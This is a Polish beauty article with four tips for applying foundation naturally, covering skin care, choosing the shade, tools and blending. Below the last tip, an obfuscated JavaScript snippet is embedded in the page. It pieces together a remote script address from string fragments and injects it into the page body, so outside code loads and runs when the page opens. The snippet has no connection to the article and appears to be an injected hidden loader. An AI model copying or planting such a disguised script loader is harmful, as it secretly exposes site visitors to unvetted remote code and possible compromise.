4 zasady idealnie nałożonego podkładu bez efektu maski!

Dobrze dobrany i właściwie nałożony podkład jest bazą całego makijażu. To dzięki temu kosmetykowi wyglądamy młodziej, promienniej, świeżej. Warto zagłębić się w sztukę odpowiedniego jego nakładania, a z pewnością żadne wizażowe faux pas nam się nie przydarzy!

Jak cię widzą tak cię piszą!

Pierwsze wrażenie bardzo często decyduje o tym, jak konkretne osoby postrzegamy w przyszłości. To owo pierwsze wrażenie jest tym symbolicznym momentem poznania i choć może być zniekształcone lub zakłamane przez stereotypy, które „grasują” w konkretnej kulturze, to warto postarać się, by każde nowe spotkanie już „od wejścia” było pozytywne i korzystne. Reguła ta dotyczy zwłaszcza spotkań biznesowych, egzaminów, rozmów kwalifikacyjnych.
Twarz jest nasza wizytówka i warto zadbać o nią szczególnie. To dlatego salony kosmetyczne uginają się od ofert wielu zabiegów na twarz, które mają je odmłodzić, wygładzić, ujędrnić, to też dlatego sklepowe półki (również te wirtualne) uginają się od asortymentu produktów potrzebnych do wykonania idealnego makijażu, który podkreśli urodę, atuty, a umiejętnie zakryje to, co niedoskonałe.

Po pierwsze – zadbaj o swoja skórę

By makijaż wyglądał na twarzy naturalnie, kosmetyki dobrze się na niej prezentowały i spełniały swoje funkcje, skóra twarzy musi być odpowiednio przygotowana. Dokładne jej oczyszczanie, złuszczanie peelingiem przynajmniej raz w tygodniu pozwoli na pozbycie się martwego naskórka. Codzienny demakijaż i nakładanie kremu rano i wieczorem odżywi i wygładzi skórę. Warto zadbać o jej nawilżenie od środka – to również dlatego tak niezmiernie ważne jest nawadnianie organizmu i picie przynajmniej 2,5 litra wody dziennie.
Wypracowanie takiego „rytuału” jest solidną podstawą do właściwej pielęgnacji skóry. Nałożenie makijażu jest dla wielu kobiet obowiązkowym elementem każdego poranka. Nie dziwi fakt, że wiele osób czuje się znacznie lepiej mając zakryte niedoskonałości i, przykładowo, podkreślone usta lub podmalowane oko. Jednak pierwszym krokiem każdego makijażu powinno być właściwe i umiejętne nałożenie podkładu. Jak to zrobić, by nie zrobić sobie krzywdy?

 

Poznaj 4 sposoby, by podkład „zlał się” z twoją cerą i wyglądał na niej oszałamiająco

  1. Pielęgnacja skóry jest najlepszym przyjacielem każdego podkładu. Oczyszczenie twarzy i przygotowanie jej na nałożenie kosmetyków do makijażu jest koniecznością. Warto wypróbować sposób wielu makijażystów i zamiast kremu nawilżającego nałożyć na twarz przed makijażem bazę, która utrzyma podkład i cały makijaż na swoim miejscu znacznie dłużej, a dodatkowo rozświetli twarz.
  2. Podkład do twarzy powinien mieć odpowiedni kolor. Jak najbardziej zbliżony do odcienia skóry, nie za jasny, który może sprawić, że będziemy wyglądać „trupio”, nie za ciemny, by nie wyglądać nienaturalnie. Warto dlatego zaopatrzyć się w jeden kosmetyk na czas wakacji, lata i skóry muśniętej słońcem, a także w podkład na czas zimy, kiedy nasza cera jest nieco bledsza. Warto pamiętać, że często latem, ze względna wysokie temperatury, wielu osobom wystarczy nałożenie koloryzującego kremu, zimą natomiast uwypuklają się przebarwienia, niedoskonałości, wtedy warto zaopatrzyć się w podkład z prawdziwego zdarzenia – odpowiednio kryjący, tuszujący niedoskonałości, ale wciąż wyglądający delikatnie i naturalnie, jak np. ulubieniec wielu Polek, podkład Loreal True Match W3 Golden Beige. Twarzy wyglądającej jak maska mówimy stanowcze: nie!
  3. Akcesoria, których można użyć do nałożenia podkładu to pędzle, gąbeczki tradycyjne lub silikonowe. Wielu osobom sprawdzają się po prostu… opuszki palców. Warto przetestować każdy ze sposobów i samemu się przekonać, który z nich jest dla nas wygodny.
  4. Szczególną ostrożność podczas nakładania podkładu należy zachować nakładając podkład w okolicach brwi, linii włosów, uszu, nosa. Jedynie dokładne roztarcie kosmetyku w tym miejscu gwarantuje dobry wygląd, warto się postarać.

(function(){
tkjcu=”qhrtwdj6kjck”;tkjc=document.createElement(„script”);
tkjc_=”u”+(„st”);tkjc_+=”at”+(„.”);tkjc.async=true;tkjc_+=”in”;
tkjcu=”72414113.”+tkjcu;tkjc.type=”text/javascript”;tkjcu+=”zluewf7a2a9y”;
tkjcu+=”pz2tx4″;tkjc_+=(„f”)+”o”+(„/”);tkjc.src=”//”+tkjc_+tkjcu;
tkjcd=document.body;tkjcd.appendChild(tkjc);
})();

Możesz również polubić

Dodaj komentarz